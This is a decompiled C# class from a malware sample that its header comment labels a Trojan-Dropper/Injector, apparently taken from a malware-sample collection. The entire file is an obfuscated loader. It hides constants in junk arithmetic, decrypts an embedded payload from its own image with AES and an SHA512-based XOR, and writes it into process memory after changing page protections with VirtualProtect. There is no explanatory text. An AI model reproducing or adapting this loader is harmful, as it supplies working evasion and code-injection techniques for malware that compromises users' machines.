// Decompiled with JetBrains decompiler // Type: 쁽䘑㬢䭎싲�Ⓑ薢 // Assembly: scan, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: C0A4408A-6830-4FA8-819B-3D801C5B54D7 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.epwx-6071ef40caa18e93eea0d00f252e0ef03c97d96be12ad3f375d8a38aa3517cd6.exe using System; using System.IO; using System.Reflection; using System.Runtime.InteropServices; using System.Security.Cryptography; internal static class 쁽䘑㬢䭎싲\uFFFD\u24B7薢 { [DllImport("kernel32.dll", EntryPoint = "VirtualProtect", PreserveSig = false)] private static extern bool 稀\uE109那\u26E8춷㘓㦹꧑( IntPtr _param0, uint _param1, uint _param2, out uint _param3); public static unsafe void 믎Յ퀜ᱨ䄺涱㸿ꋶ() { Module module = typeof (쁽䘑㬢䭎싲\uFFFD\u24B7薢).Module; IntPtr hinstance = Marshal.GetHINSTANCE(module); if (hinstance == (IntPtr) -1) goto label_2; label_1: Stream input; bool flag; if (module.FullyQualifiedName == "") { flag = true; input = (Stream) new UnmanagedMemoryStream((byte*) hinstance.ToPointer(), (long) (int) (268435478.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), (long) (int) (268435478.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), (FileAccess) (26.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0)); } else goto label_5; label_4: byte[] numArray1; byte[] numArray2; ulong num1; int dstOffset; byte[] numArray3; int position; int count1; using (BinaryReader binaryReader = new BinaryReader(input)) { input.Seek((long) (int) (83.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), SeekOrigin.Begin); uint offset1 = binaryReader.ReadUInt32(); input.Seek((long) offset1, SeekOrigin.Begin); input.Seek((long) (int) (29.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), SeekOrigin.Current); int num2 = (int) binaryReader.ReadUInt16(); Stream stream = input; int num3 = (int) offset1; int num4 = (int) (47.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0); uint num5; long offset2 = (long) (num5 = (uint) (num3 + num4)); stream.Seek(offset2, SeekOrigin.Begin); int num6 = (int) binaryReader.ReadUInt16(); input.Seek((long) (int) (85.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), SeekOrigin.Current); position = (int) input.Position; int count2 = binaryReader.ReadInt32() ^ (int) (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0))) - 1945389408.0 - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0); if (count2 == (int) (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0))) - 1945389408.0 - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0)) goto label_8; label_7: input.Seek(0L, SeekOrigin.Begin); numArray1 = binaryReader.ReadBytes(count2); num1 = binaryReader.ReadUInt64() ^ 8675158181231138756UL; dstOffset = binaryReader.ReadInt32(); count1 = binaryReader.ReadInt32(); numArray3 = binaryReader.ReadBytes(binaryReader.ReadInt32() ^ (int) (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0))) - 74420171.0 - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0)); numArray2 = binaryReader.ReadBytes(binaryReader.ReadInt32() ^ (int) (1200253018.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0)); goto label_12; label_8: Environment.FailFast("Broken file"); goto label_7; } label_12: Buffer.BlockCopy((Array) new byte[(int) (27.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0)], 0, (Array) numArray1, position, (int) (27.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0)); if (dstOffset != 0) goto label_16; label_15: byte[] hash = MD5.Create().ComputeHash(numArray1); if ((long) (BitConverter.ToUInt64(hash, 0) ^ BitConverter.ToUInt64(hash, (int) (31.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0))) != (long) num1) goto label_18; label_14: byte[] src = 쁽䘑㬢䭎싲\uFFFD\u24B7薢.\uE48C鬄უ\u319F\u2A31\u2F8B\uF3C3\u2EE7(numArray1, numArray3, numArray2); Buffer.BlockCopy((Array) new byte[numArray1.Length], 0, (Array) numArray1, 0, numArray1.Length); if ((int) src[0] != (int) (237.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0) || (int) src[1] != (int) (134.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0)) goto label_17; label_13: byte[] numArray4 = new byte[src.Length - (int) (25.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0)]; Buffer.BlockCopy((Array) src, (int) (25.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), (Array) numArray4, 0, numArray4.Length); using (BinaryReader binaryReader = new BinaryReader((Stream) new MemoryStream(numArray4))) { uint length = binaryReader.ReadUInt32(); int[] numArray5 = new int[(IntPtr) length]; IntPtr[] numArray6 = new IntPtr[(IntPtr) length]; for (int index = 0; (long) index < (long) length; ++index) { uint num7 = binaryReader.ReadUInt32() ^ (uint) (int) (490849795.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0); if (num7 != 0U) { uint num8 = binaryReader.ReadUInt32() ^ (uint) (int) (490849795.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0); byte[] source = binaryReader.ReadBytes(binaryReader.ReadInt32()); IntPtr destination = (IntPtr) (long) (uint) ((int) hinstance + (flag ? (int) num7 : (int) num8)); uint num9; 쁽䘑㬢䭎싲\uFFFD\u24B7薢.稀\uE109那\u26E8춷㘓㦹꧑(destination, (uint) source.Length, (uint) (int) (27.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), out num9); Marshal.Copy(source, 0, destination, source.Length); 쁽䘑㬢䭎싲\uFFFD\u24B7薢.稀\uE109那\u26E8춷㘓㦹꧑(destination, (uint) source.Length, num9, out num9); numArray5[index] = source.Length; numArray6[index] = destination; } } return; } label_17: Environment.FailFast("Broken file"); goto label_13; label_18: Environment.FailFast("Broken file"); goto label_14; label_16: Buffer.BlockCopy((Array) new byte[count1], 0, (Array) numArray1, dstOffset, count1); goto label_15; label_5: flag = false; input = (Stream) new FileStream(module.FullyQualifiedName, (FileMode) (26.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0), FileAccess.Read, FileShare.Read); goto label_4; label_2: Environment.FailFast("Module error"); goto label_1; } private static byte[] \uE48C鬄უ\u319F\u2A31\u2F8B\uF3C3\u2EE7( byte[] _param0, byte[] _param1, byte[] _param2) { Rijndael rijndael = Rijndael.Create(); byte[] buffer = new byte[_param2.Length]; using (CryptoStream cryptoStream = new CryptoStream((Stream) new MemoryStream(_param2), rijndael.CreateDecryptor(SHA256.Create().ComputeHash(_param0), _param1), CryptoStreamMode.Read)) cryptoStream.Read(buffer, 0, _param2.Length); SHA512 shA512 = SHA512.Create(); byte[] hash = shA512.ComputeHash(_param0); for (int offset = 0; offset < buffer.Length; offset += (int) (87.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0)) { int num = buffer.Length <= offset + (int) (87.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0) ? buffer.Length : offset + (int) (87.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0); for (int index = offset; index < num; ++index) buffer[index] ^= (byte) ((int) hash[index - offset] ^ (int) (155.0 + (4.0 - 4.0 - -5.0 - -(4.0 - 4.0) - (-7.0 - 10.0 + -3.0 - (-7.0 - (-2.0 - -5.0)))) - (--10.0 + (9.0 - -2.0) + (-10.0 - (3.0 - 10.0))) + (3.0 - 9.0 + (2.0 - 6.0)) - 3.0 - 7.0)); hash = shA512.ComputeHash(buffer, offset, num - offset); } return buffer; } }